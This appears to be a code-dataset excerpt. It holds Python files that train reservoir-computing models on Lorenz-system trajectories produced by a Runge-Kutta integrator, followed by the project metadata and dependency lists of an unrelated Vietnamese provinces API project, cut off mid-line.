"fe5653d3500e9899a7cea6fa8424d9d485ab8ca8", "content_id": "a5e08cabcde722a25a59b68adde8d8b820d59480", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11071, "license_type": "no_license", "max_line_length": 243, "num_lines": 276, "path": "/lorenz_res_vanilla.py", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 12:57:49 2020\n\n@author: josephharvey\n\"\"\"\n\nfrom lorenzrungekutta import rungekutta\nfrom lorenzrungekutta import fx\nfrom lorenzrungekutta import fy\nfrom lorenzrungekutta import fz\nimport numpy as np\n#from sklearn.linear_model import Ridge\nfrom scipy import sparse\nfrom scipy.linalg import solve\nfrom scipy.sparse.linalg import eigs\nfrom matplotlib import pyplot as plt\n\nclass Reservoir:\n def __init__(self, rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1):\n self.rsvr_size = rsvr_size\n \n #get spectral radius < 1\n #gets row density = 0.03333\n unnormalized_W = (np.random.rand(rsvr_size,rsvr_size)*2 - 1)\n for i in range(unnormalized_W[:,0].size):\n for j in range(unnormalized_W[0].size):\n if np.random.rand(1) > 10/rsvr_size:\n unnormalized_W[i][j] = 0\n \n max_eig = eigs(unnormalized_W, k = 1, return_eigenvectors = False)\n \n self.W = sparse.csr_matrix(spectral_radius/np.abs(max_eig)*unnormalized_W)\n \n const_conn = int(rsvr_size*0.15)\n Win = np.zeros((rsvr_size, 4))\n Win[:const_conn, 0] = (np.random.rand(Win[:const_conn, 0].size)*2 - 1)*input_weight\n Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1] = (np.random.rand(Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1].size)*2 - 1)*input_weight\n Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2] = (np.random.rand(Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2].size)*2 - 1)*input_weight\n Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3] = (np.random.rand(Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3].size)*2 - 1)*input_weight\n \n self.Win = sparse.csr_matrix(Win)\n self.X = (np.random.rand(rsvr_size, rk.train_length+2)*2 - 1)\n self.Wout = np.array([])\n \nclass RungeKutta:\n def __init__(self, x0 = 2,y0 = 2,z0 = 23, h = 0.01, T = 300, ttsplit = 5000, noise_scaling = 0):\n u_arr = rungekutta(x0,y0,z0,h,T)[:, ::5]\n self.train_length = ttsplit\n \n u_arr[0] = (u_arr[0] - 0)/7.929788629895004\n u_arr[1] = (u_arr[1] - 0)/8.9932616136662\n u_arr[2] = (u_arr[2] - 23.596294463016896)/8.575917849311919\n \n self.u_arr_train = u_arr[:, :ttsplit+1]\n #size 5001\n \n #noisy training array\n #switch to gaussian \n noise = np.random.randn(self.u_arr_train[:,0].size, self.u_arr_train[0,:].size)*noise_scaling \n self.u_arr_train_noise = self.u_arr_train + noise\n \n #plt.plot(self.u_arr_train_noise[0, :500])\n \n #u[5000], the 5001st element, is the last in u_arr_train and the first in u_arr_test\n self.u_arr_test = u_arr[:, ttsplit:]\n #size 1001\n \n#takes a reservoir object res along with initial conditions\ndef getX(res, rk,x0 = 1,y0 = 1,z0 = 1, noise = False):\n \n if noise:\n u_training = rk.u_arr_train_noise\n else:\n u_training = rk.u_arr_train\n \n #loops through every timestep\n for i in range(0, u_training[0].size):\n u = np.append(1, u_training[:,i]).reshape(4,1)\n \n x = res.X[:,i].reshape(res.rsvr_size,1)\n x_update = np.tanh(np.add(res.Win.dot(u), res.W.dot(x)))\n \n res.X[:,i+1] = x_update.reshape(1,res.rsvr_size) \n \n return res.X\n \ndef trainRRM(res, rk):\n print(\"Training... \")\n\n alph = 10**-4\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = rk.u_arr_train[:, 301:]\n\n \n X = getX(res, rk, noise = True)[:, 301:(res.X[0].size - 1)]\n X_train = np.concatenate((np.ones((1, rk.u_arr_train[0].size-301)), X, rk.u_arr_train[:, 300:(rk.u_arr_train[0].size - 1)]), axis = 0)\n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+4)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return\n \ndef predict(res, x0 = 0, y0 = 0, z0 = 0, steps = 1000):\n Y = np.empty((3, steps + 1))\n X = np.empty((res.rsvr_size, steps + 1))\n \n Y[:,0] = np.array([x0,y0,z0]).reshape(1,3) \n X[:,0] = res.X[:,-2]\n\n \n for i in range(0, steps):\n y_in = np.append(1, Y[:,i]).reshape(4,1)\n x_prev = X[:,i].reshape(res.rsvr_size,1)\n \n x_current = np.tanh(np.add(res.Win.dot(y_in), res.W.dot(x_prev)))\n X[:,i+1] = x_current.reshape(1,res.rsvr_size)\n #X = np.concatenate((X, x_current), axis = 1)\n \n y_out = np.matmul(res.Wout, np.concatenate((np.array([[1]]), x_current, Y[:,i].reshape(3,1)), axis = 0))\n #y_out = np.matmul(res.Wout, x_current)\n Y[:,i+1] = y_out.reshape(1, 3)\n \n\n return Y\n\ndef test(res, num_tests = 10, rkTime = 200, split = 2000, showVectorField = True, showTrajectories = True):\n valid_time = np.array([])\n \n means = np.zeros(num_tests)\n variances = np.zeros(num_tests)\n \n for i in range(num_tests):\n pred_dxdt = np.array([]) \n lorenz_dxdt = np.array([])\n pred_dydt = np.array([])\n lorenz_dydt = np.array([])\n pred_dzdt = np.array([])\n lorenz_dzdt = np.array([]) \n x2y2z2 = np.array([]) \n \n ic = np.random.rand(3)*2-1\n rktest = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = rkTime, ttsplit = split)\n res.X = (np.zeros((res.rsvr_size, split+2))*2 - 1)\n \n #sets res.X\n getX(res, rktest)\n \n pred = predict(res, x0 = rktest.u_arr_test[0,0], y0 = rktest.u_arr_test[1,0], z0 = rktest.u_arr_test[2,0], steps = (rkTime*20-split))\n \n check_vt = True\n for j in range(0, pred[0].size):\n if (j > 0) and (j < pred[0].size-1):\n #vector_field = np.append(vector_field, ((pred[0,j+1]-pred[0,j-1])/0.1-fx(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662)/7.929788629895004)**2) \n \n pred_dxdt = np.append(pred_dxdt, (pred[0,j+1]-pred[0,j-1])/0.1)\n lorenz_dxdt = np.append(lorenz_dxdt, fx(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662)/7.929788629895004) \n \n pred_dydt = np.append(pred_dydt, (pred[1,j+1]-pred[1,j-1])/0.1)\n lorenz_dydt = np.append(lorenz_dydt, fy(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662, pred[2,j]*8.575917849311919+23.596294463016896)/8.9932616136662) \n \n pred_dzdt = np.append(pred_dzdt, (pred[2,j+1]-pred[2,j-1])/0.1)\n lorenz_dzdt = np.append(lorenz_dzdt, (fz(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662, pred[2,j]*8.575917849311919+23.596294463016896)-23.596294463016896)/8.575917849311919) \n \n x2error = (pred_dxdt[-1]-lorenz_dxdt[-1])**2\n y2error = (pred_dydt[-1]-lorenz_dydt[-1])**2\n z2error = (pred_dzdt[-1]-lorenz_dzdt[-1])**2\n \n x2y2z2 = np.append(x2y2z2, (x2error+y2error+z2error)) \n \n if (np.abs(pred[0, j] - rktest.u_arr_test[0, j]) > 1.5) and check_vt:\n valid_time = np.append(valid_time, j)\n \n print(\"Test \" + str(i) + \" valid time: \" + str(j))\n check_vt = False\n \n \n #print(\"Mean: \" + str(np.mean(pred[0])))\n #print(\"Variance: \" + str(np.var(pred[0])))\n \n print(\"Variance of x+y+z square error: \" + str(np.var(x2y2z2)))\n print(\"Max of x+y+z square error: \" + str(max(x2y2z2)))\n \n if max(x2y2z2) > 200 and np.var(x2y2z2) > 100:\n print(\"INSTABILITY PREDICTED\")\n \n print(x2y2z2.size)\n \n means[i] = np.mean(pred[0])\n variances[i] = np.var(pred[0])\n \n if showVectorField:\n #plt.figure()\n #plt.plot(vector_field, label = \"Vector Field Stability Metric\")\n #plt.legend(loc=\"upper right\") \n \n plt.figure() \n plt.plot(x2y2z2, label = \"x + y + z square error\")\n plt.legend(loc=\"upper right\")\n plt.figure()\n plt.plot(pred_dzdt, label = \"pred dzdt\")\n plt.plot(lorenz_dzdt, label = \"lorenz dzdt\") \n plt.legend(loc=\"upper right\")\n plt.figure()\n plt.plot(pred_dydt, label = \"pred dydt\")\n plt.plot(lorenz_dydt, label = \"lorenz dydt\")\n plt.legend(loc=\"upper right\")\n plt.figure()\n plt.plot(pred_dxdt, label = \"pred dxdt\")\n plt.plot(lorenz_dxdt, label = \"lorenz dxdt\")\n plt.legend(loc=\"upper right\")\n \n \n if showTrajectories:\n plt.figure()\n plt.plot(pred[0], label = \"Predictions\")\n plt.plot(rktest.u_arr_test[0], label = \"Truth\") \n plt.legend(loc=\"upper right\") \n \n \n if showVectorField or showTrajectories:\n plt.show()\n \n print(\"Avg. valid time steps: \" + str(np.mean(valid_time)))\n print(\"Std. valid time steps: \" + str(np.std(valid_time)))\n print(\"Avg. of x dim: \" + str(np.mean(means)))\n print(\"Var. of x dim: \" + str(np.mean(variances)))\n return np.mean(valid_time)\n\n#use 50, noise_scaling = 0.025\n#res = Reservoir(rsvr_size = 40, spectral_radius = 0.5, input_weight = 1.0)\n#rk = RungeKutta(T = 300, noise_scaling = 0.009)\n#trainRRM(res, rk)\n\n#plot predictions immediately after training \n#predictions = predict(res, x0 = rk.u_arr_test[0,0], y0 = rk.u_arr_test[1,0], z0 = rk.u_arr_test[2,0])\n#plt.plot(predictions[0])\n#plt.plot(rk.u_arr_test[0])\n\n#print(predictions[0,1]-rk.u_arr_test[0,1])\n\n#test(res, 10, showPlots = True)\n\nseed = 19\nnp.random.seed(seed)\n\ntrain_time = 300\nrk = RungeKutta(T = train_time, ttsplit = train_time*20, noise_scaling = 0.001) #ttsplit = train_time*20\n\nresults = np.array([])\nnum_res = 1\nfor i in range (num_res):\n print(\"Reservoir \" + str(i+1) + \" of \" + str(num_res) + \" with seed \" + str(seed))\n res = Reservoir(rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1.0)\n trainRRM(res, rk) \n results = np.append(results, test(res, 5, rkTime = 200, showVectorField = True, showTrajectories= True))\n \nprint(\"Average valid time for \" + str(num_res) + \" reservoirs at \" + str(train_time) + \": \" + str(np.mean(results)))\nprint(results) " }, { "alpha_fraction": 0.6200000047683716, "alphanum_fraction": 0.7799999713897705, "avg_line_length": 24, "blob_id": "f6b9b5c8b85e21f9c497317992172c6b46dd17f6", "content_id": "858e9b16a1d6ef52976c819cb50c4468082a9c34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 50, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "# trend_2020\nrepository for my UMD TREND 2020 REU\n" }, { "alpha_fraction": 0.4461916387081146, "alphanum_fraction": 0.5149877071380615, "avg_line_length": 26.486486434936523, "blob_id": "aa70d984dc5d02b8f4c1d767d450b0165d77d1e0", "content_id": "f105de5f3e792418b4f821a2fd183c993d155d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2035, "license_type": "no_license", "max_line_length": 77, "num_lines": 74, "path": "/lorenzrungekutta.py", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 4 11:26:12 2020\n\n@author: josephharvey\n\"\"\"\nimport numpy as np\nfrom numba import jit\n\na = 10\nb = 28\nc = 8/3\nh = 0.01\nT = 100\n\n@jit(nopython = True, fastmath = True)\ndef fx(x,y):\n return -a*x + a*y\n \n@jit(nopython = True, fastmath = True)\ndef fy(x,y,z):\n return b*x - y - x*z\n\n@jit(nopython = True, fastmath = True)\ndef fz(x,y,z):\n return -c*z + x*y\n\n#@jit(nopython = True, fastmath = True)\ndef rungekutta(x0 = 1,y0 = 1,z0 = 1, h = 0.01, T = 100):\n xarr = np.array([x0])\n yarr = np.array([y0])\n zarr = np.array([z0])\n \n #loops from t = 0 to T \n for i in range(0, int(T/h)):\n \n k1x = fx(xarr[i], yarr[i])\n k1y = fy(xarr[i], yarr[i], zarr[i])\n k1z = fz(xarr[i], yarr[i], zarr[i])\n \n k2x = fx(xarr[i] + h*k1x/2, yarr[i] + h*k1y/2)\n k2y = fy(xarr[i] + h*k1x/2, yarr[i] + h*k1y/2, zarr[i] + h*k1z/2)\n k2z = fz(xarr[i] + h*k1x/2, yarr[i] + h*k1y/2, zarr[i] + h*k1z/2)\n \n k3x = fx(xarr[i] + h*k2x/2, yarr[i] + h*k2y/2)\n k3y = fy(xarr[i] + h*k2x/2, yarr[i] + h*k2y/2, zarr[i] + h*k2z/2)\n k3z = fz(xarr[i] + h*k2x/2, yarr[i] + h*k2y/2, zarr[i] + h*k2z/2)\n \n k4x = fx(xarr[i] + h*k3x, yarr[i] + h*k3y)\n k4y = fy(xarr[i] + h*k3x, yarr[i] + h*k3y, zarr[i] + h*k3z)\n k4z = fz(xarr[i] + h*k3x, yarr[i] + h*k3y, zarr[i] + h*k3z)\n \n xarr = np.append(xarr, (xarr[i] + 1/6*h*(k1x + 2*k2x + 2*k3x + k4x)))\n yarr = np.append(yarr, (yarr[i] + 1/6*h*(k1y + 2*k2y + 2*k3y + k4y)))\n zarr = np.append(zarr, (zarr[i] + 1/6*h*(k1z + 2*k2z + 2*k3z + k4z)))\n \n \n return np.stack([xarr,yarr,zarr])\n\n#u = rungekutta(1,1,1)\n\n#time = np.array(range(0,2201))\n\n#plt.plot(time, u[0])\n\n#u_longterm = u[:,200:]\n#time = np.array(range(0, u_longterm[0].size))\n#plt.plot(u_longterm[2], u_longterm[0])\n\n#u_sample = u[:, 0::10]\n#print(u_sample.shape)\n#time = np.array(range(0, u_sample[0].size))\n#plt.plot(time, u_sample[0])\n\n" }, { "alpha_fraction": 0.5358785390853882, "alphanum_fraction": 0.5802667737007141, "avg_line_length": 37.469024658203125, "blob_id": "e4d51b9edfdcdb1f5414355fda46e54d9724116e", "content_id": "dc31513ae096a348c3cc20e74834eb9417554acb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8696, "license_type": "no_license", "max_line_length": 202, "num_lines": 226, "path": "/lorenz_reservoir_6in6out.py", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 12:57:49 2020\n\n@author: josephharvey\n\"\"\"\n\nfrom lorenzrungekutta import rungekutta\nimport numpy as np\n#from sklearn.linear_model import Ridge\nfrom scipy import sparse\nfrom scipy.linalg import solve\nfrom scipy.sparse.linalg import eigs\nfrom matplotlib import pyplot as plt\n\nnp.random.seed()\n\n#why is lorenz signal passing 0?\n\n#50 seems to be unstable boundary\nclass Reservoir:\n def __init__(self, rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1):\n self.rsvr_size = rsvr_size\n \n #get spectral radius < 1\n #gets row density = 0.03333\n unnormalized_W = (np.random.rand(rsvr_size,rsvr_size)*2 - 1)\n for i in range(unnormalized_W[:,0].size):\n for j in range(unnormalized_W[0].size):\n if np.random.rand(1) > 10/rsvr_size:\n unnormalized_W[i][j] = 0\n \n max_eig = eigs(unnormalized_W, k = 1, return_eigenvectors = False)\n \n self.W = sparse.csr_matrix(spectral_radius/np.abs(max_eig)*unnormalized_W)\n \n const_conn = int(rsvr_size*0.1)\n signal_conn = int((rsvr_size-const_conn)/6)\n \n \n Win = np.zeros((rsvr_size, 7))\n #constant\n Win[:const_conn, 0] = (np.random.rand(Win[:const_conn, 0].size)*2 - 1)*input_weight\n #x\n Win[const_conn: const_conn + signal_conn, 1] = (np.random.rand(Win[const_conn: const_conn + signal_conn, 1].size)*2 - 1)*input_weight\n #y\n Win[const_conn + signal_conn:const_conn + 2*signal_conn, 2] = (np.random.rand(Win[const_conn + signal_conn:const_conn + 2*signal_conn, 2].size)*2 - 1)*input_weight\n #z\n Win[const_conn + 2*signal_conn: const_conn + 3*signal_conn, 3] = (np.random.rand(Win[const_conn + 2*signal_conn: const_conn + 3*signal_conn, 3].size)*2 - 1)*input_weight\n #x^2\n Win[const_conn + 3*signal_conn:const_conn + 4*signal_conn, 4] = (np.random.rand(Win[const_conn + 3*signal_conn:const_conn + 4*signal_conn, 4].size)*2 - 1)*input_weight\n #y^2\n Win[const_conn + 4*signal_conn:const_conn + 5*signal_conn, 5] = (np.random.rand(Win[const_conn + 4*signal_conn:const_conn + 5*signal_conn, 5].size)*2 - 1)*input_weight\n #z^2\n Win[const_conn + 5*signal_conn:, 6] = (np.random.rand(Win[const_conn + 5*signal_conn:, 6].size)*2 - 1)*input_weight\n \n \n self.Win = sparse.csr_matrix(Win)\n self.X = (np.random.rand(rsvr_size, rk.train_length+2)*2 - 1)\n self.Wout = np.array([])\n \nclass RungeKutta:\n def __init__(self, x0 = 2,y0 = 2,z0 = 23, h = 0.01, T = 300, ttsplit = 5000, noise_scaling = 0):\n u_arr = rungekutta(x0,y0,z0,h,T)[:, ::5]\n self.train_length = ttsplit\n \n u_arr[0] = (u_arr[0] - 0)/7.929788629895004\n u_arr[1] = (u_arr[1] - 0)/8.9932616136662\n u_arr[2] = (u_arr[2] - 23.596294463016896)/8.575917849311919\n \n self.u_arr_train = u_arr[:, :ttsplit+1]\n #size 5001\n \n #noisy training array\n #switch to gaussian \n noise = np.random.randn(self.u_arr_train[:,0].size, self.u_arr_train[0,:].size)*noise_scaling \n self.u_arr_train_noise = self.u_arr_train + noise\n \n #plt.plot(self.u_arr_train_noise[0, :500])\n \n #u[5000], the 5001st element, is the last in u_arr_train and the first in u_arr_test\n self.u_arr_test = u_arr[:, ttsplit:]\n #size 1001\n \n#takes a reservoir object res along with initial conditions\ndef getX(res, rk,x0 = 1,y0 = 1,z0 = 1, noise = False):\n \n if noise:\n u_training = rk.u_arr_train_noise\n else:\n u_training = rk.u_arr_train\n \n #loops through every timestep\n for i in range(0, u_training[0].size):\n u = np.concatenate((np.array([1]), u_training[:,i], transform(u_training[:,i]))).reshape(7,1)\n \n x = res.X[:,i].reshape(res.rsvr_size,1)\n x_update = np.tanh(np.add(res.Win.dot(u), res.W.dot(x)))\n \n res.X[:,i+1] = x_update.reshape(1,res.rsvr_size) \n \n return res.X\n \ndef trainRRM(res, rk):\n print(\"Training... \")\n\n alph = 10**-4\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = np.concatenate((rk.u_arr_train[:, 301:], transform(rk.u_arr_train[:, 301:])), axis = 0)\n \n X = getX(res, rk, noise = True)[:, 301:(res.X[0].size - 1)]\n X_train = np.concatenate((np.ones((1, rk.u_arr_train[0].size-301)), X, rk.u_arr_train[:, 300:(rk.u_arr_train[0].size - 1)], transform(rk.u_arr_train[:, 300:(rk.u_arr_train[0].size - 1)])), axis = 0)\n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+7)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return\n \ndef predict(res, x0 = 0, y0 = 0, z0 = 0, steps = 1000):\n Y = np.empty((6, steps + 1))\n X = np.empty((res.rsvr_size, steps + 1))\n \n Y[:3,0] = np.array([x0,y0,z0]).reshape(1,3)\n Y[3:,0] = transform(np.array([x0,y0,z0]).reshape(1,3))\n X[:,0] = res.X[:,-2]\n\n \n for i in range(0, steps):\n y_in = np.concatenate((np.array([1]), Y[:,i]), axis = 0).reshape(7,1) \n x_prev = X[:,i].reshape(res.rsvr_size,1)\n \n x_current = np.tanh(np.add(res.Win.dot(y_in), res.W.dot(x_prev)))\n X[:,i+1] = x_current.reshape(1,res.rsvr_size)\n #X = np.concatenate((X, x_current), axis = 1)\n \n y_out = np.matmul(res.Wout, np.concatenate((np.array([[1]]), x_current, Y[:,i].reshape(6,1)), axis = 0))\n #y_out = np.matmul(res.Wout, x_current)\n Y[:,i+1] = y_out.reshape(1, 6) \n \n\n return Y\n\ndef test(res, num_tests = 10, rkTime = 200, split = 2000, showPlots = True):\n valid_time = np.array([])\n means = np.zeros(num_tests)\n variances = np.zeros(num_tests)\n \n for i in range(num_tests):\n ic = np.random.rand(3)*2-1\n rktest = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = rkTime, ttsplit = split)\n res.X = (np.zeros((res.rsvr_size, split+2))*2 - 1)\n \n #sets res.X\n getX(res, rktest)\n \n pred = predict(res, x0 = rktest.u_arr_test[0,0], y0 = rktest.u_arr_test[1,0], z0 = rktest.u_arr_test[2,0], steps = (rkTime*20-split))\n \n for j in range(0, pred[0].size):\n if np.abs(pred[0, j] - rktest.u_arr_test[0, j]) > 1.5:\n valid_time = np.append(valid_time, j)\n print(\"Test \" + str(i) + \" valid time: \" + str(j))\n break\n \n print(\"Mean: \" + str(np.mean(pred[0])))\n print(\"Variance: \" + str(np.var(pred[0])))\n \n means[i] = np.mean(pred[0])\n variances[i] = np.var(pred[0])\n \n if showPlots:\n plt.figure()\n plt.plot(pred[0])\n plt.plot(rktest.u_arr_test[0])\n \n if showPlots:\n plt.show()\n \n print(\"Avg. valid time steps: \" + str(np.mean(valid_time)))\n print(\"Std. valid time steps: \" + str(np.std(valid_time)))\n print(\"Avg. of x dim: \" + str(np.mean(means)))\n print(\"Var. of x dim: \" + str(np.mean(variances)))\n return np.mean(valid_time)\n\ndef transform(x):\n return np.tanh(x)*0.0001 \n\n#fidelity metric\n#valid time - consider three inputs and 6 inputs\n#try at a few res. sizes\n\n#stability criterion, comparing no noise, 3 inputs, 6 inputs, noise: \n#eyeball test\n#mean and variance of all datapoints\n#intervals between sign changes \n#compute correlation function \n\ntrain_time = 300 \nrk = RungeKutta(T = train_time, ttsplit = train_time*20, noise_scaling = 0.000) #ttsplit = train_time*20\n\nresults = np.array([])\nnum_res = 10\nfor i in range (num_res):\n print(\"Reservoir \" + str(i+1) + \" of \" + str(num_res))\n res = Reservoir(rk, rsvr_size = 50, spectral_radius = 0.5, input_weight = 1)\n trainRRM(res, rk) \n results = np.append(results, test(res, 5, rkTime = 200, showPlots = True))\n print(results.size)\nprint(\"Average valid time for \" + str(num_res) + \" reservoirs at \" + str(train_time) + \": \" + str(np.mean(results)))\nprint(results) \n\n" } ]
5
ngoc-tuyen/vn-open-api-provinces
https://github.com/ngoc-tuyen/vn-open-api-provinces
bd1ff6d8534c1a77f21a9e0305eed1d81c60455e
44234c728ce8ac92f29071ba17018dcd874f7c43
04f3581194896f4653dc71a9de2f88772e9e4fb4
refs/heads/main
2023-08-01T17:59:13.700333
2021-09-26T09:08:47
2021-09-26T09:08:47
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5142428874969482, "alphanum_fraction": 0.6116941571235657, "avg_line_length": 21.233333587646484, "blob_id": "a3389b947578cfc62c88173caf69031fb31e3ce3", "content_id": "f08819a28674b4717a9b95bd5c547c97c9428eae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 667, "license_type": "no_license", "max_line_length": 70, "num_lines": 30, "path": "/pyproject.toml", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"vn-open-api-provinces\"\nversion = \"0.2.0\"\ndescription = \"\"\nauthors = [\"Nguyễn Hồng Quân <[email protected]>\"]\nlicense = \"GPL-3.0-or-later\"\n\n[tool.poetry.dependencies]\npython = \"^3.6.1\"\nfastapi = \"^0.66.0\"\npydantic = \"^1.8.2\"\nLogbook = \"^1.5.3\"\nvietnam-provinces = \"^0.4.2\"\nuvicorn = \"^0.14.0\"\ndataclasses = { version = \"^0.8\", markers = \"python_version < '3.7'\" }\nfastapi-rfc7807 = \"^0.5.0\"\naiofiles = \"^0.7.0\"\nlunr = \"^0.6.0\"\nUnidecode = \"^1.2.0\"\nsingle-version = \"^1.5.1\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^5.2\"\ndoc8 = \"^0.8.1\"\nflake8 = \"^3.9.2\"\nwheel = \"^0.37.0\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n" }, { "alpha_fraction": 0.5118279457092285, "alphanum_fraction": 0.5591397881507874, "avg_line_length": 24.83333396911621, "blob_id": "567096f52024862aa99ba491ceb6754afb65bb86", "content_id": "22a2508e16c46d4dc7c1207904681291389c1c98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JSON", "length_bytes": 465, "license_type": "no_license", "max_line_length": 107, "num_lines": 18, "path": "/front-dev/package.json", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "{\n \"name\": \"front\",\n \"version\": \"1.0.0\",\n \"main\": \"index.js\",\n \"license\": \"MIT\",\n \"private\": true,\n \"scripts\": {\n \"build-tailwind\": \"NODE_ENV=production npx tailwindcss build -o ../static/vendor/tailwind.css --minify\"\n },\n \"devDependencies\": {\n \"@tailwindcss/aspect-ratio\": \"^0.2.1\",\n \"@tailwindcss/forms\": \"^0.3.3\",\n \"@tailwindcss/typography\": \"^0.4.1\",\n \"autoprefixer\": \"^10.3.0\",\n \"cssnano\": \"^5.0.6\",\n \"tailwindcss\": \"^2.2.4\"\n }\n}\n" }, { "alpha_fraction": 0.5493670701980591, "alphanum_fraction": 0.65139240026474, "avg_line_length": 95.34146118164062, "blob_id": "f679f270d2b45816a773b5ebf1e1fca6f8348120", "content_id": "b707f1f0072125aec445827041e4ff0bdb88addd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 3950, "license_type": "no_license", "max_line_length": 658, "num_lines": 41, "path": "/requirements.txt", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "aiofiles==0.7.0; python_version >= \"3.6\" and python_version < \"4.0\"\nasgiref==3.4.1; python_version >= \"3.6\"\natomicwrites==1.4.0; python_version >= \"3.5\" and python_full_version < \"3.0.0\" and sys_platform == \"win32\" or sys_platform == \"win32\" and python_version >= \"3.5\" and python_full_version >= \"3.4.0\"\nattrs==21.2.0; python_version >= \"3.5\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\" and python_version >= \"3.5\"\nchardet==4.0.0; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\nclick==8.0.1; python_version >= \"3.6\"\ncolorama==0.4.4; python_version >= \"3.6\" and python_full_version < \"3.0.0\" and sys_platform == \"win32\" and platform_system == \"Windows\" or sys_platform == \"win32\" and python_version >= \"3.6\" and python_full_version >= \"3.5.0\" and platform_system == \"Windows\"\ndataclasses==0.8; python_version >= \"3.6\" and python_version < \"3.7\" and python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\" or python_version < \"3.7\"\ndoc8==0.8.1\ndocutils==0.17.1; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\nfast-enum==1.3.0; python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\"\nfastapi-rfc7807==0.5.0; python_version >= \"3.6\"\nfastapi==0.66.1; python_version >= \"3.6\"\nflake8==3.9.2; (python_version >= \"2.7\" and python_full_version < \"3.0.0\") or (python_full_version >= \"3.5.0\")\nh11==0.12.0; python_version >= \"3.6\"\nimportlib-metadata==2.1.1; python_version >= \"3.6\" and python_version < \"3.8\" and python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\" and (python_version >= \"3.5\" and python_full_version < \"3.0.0\" and python_version < \"3.8\" or python_version < \"3.8\" and python_version >= \"3.5\" and python_full_version >= \"3.5.0\") and (python_version >= \"2.7\" and python_full_version < \"3.0.0\" and python_version < \"3.8\" or python_full_version >= \"3.5.0\" and python_version < \"3.8\") and (python_version >= \"3.6\" and python_full_version < \"3.0.0\" and python_version < \"3.8\" or python_version < \"3.8\" and python_version >= \"3.6\" and python_full_version >= \"3.5.0\")\nlogbook==1.5.3\nlunr==0.6.0; python_version >= \"3.6\"\nmccabe==0.6.1; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\nmore-itertools==8.8.0; python_version >= \"3.5\"\npackaging==21.0; python_version >= \"3.6\"\npbr==5.6.0; python_version >= \"3.6\"\npluggy==0.13.1; python_version >= \"3.5\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.4.0\" and 